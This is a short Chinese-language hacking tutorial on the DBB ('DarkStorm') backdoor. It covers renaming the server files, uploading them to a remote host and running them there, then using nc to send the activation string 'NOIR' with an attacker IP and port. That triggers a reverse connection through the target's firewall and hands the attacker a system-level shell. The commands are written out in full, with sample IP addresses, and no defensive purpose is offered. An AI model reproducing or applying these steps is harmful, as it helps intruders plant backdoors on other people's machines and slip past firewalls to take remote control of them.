穿梭于防火墙下的黑马DBB后门程序

　　小提示:DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成，这两个exe和DLL文件是可以改名的，但是必须要改成同样的名字，比如，可以把exe文件改名为123.exe，那么dll文件也要相应的改名为123.dll。

　　二、打开后门

　　要运行后门很简单，只要将exe和dll文件上传到远程主机上之后，直接运行exe文件，后门即可被加载。

　　小提示:exe文件和dll文件不必一定要放到system32中，但必须在同一文件夹下。

　　大家都知道，现在很多情况下主机是在防火墙后面的，如何让后门来逃避防火墙的火眼金睛呢?这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的，仅支持nc反向连接。

　　首先在本地计算机中使用nc监听本地计算机的8888端口，进入命令行状态，运行如下命令: nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)，接着再开一个命令行窗口，运行命令:nc 220.202.242.101 139，然后输入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址，NOIR为反弹激活字，220.202.242.98:8888为反向连接的IP地址，也就是本机IP地址及端口。如果反向连接成功，就会在本地计算机中得到目标主机的一个系统权限SHELL(如图2)。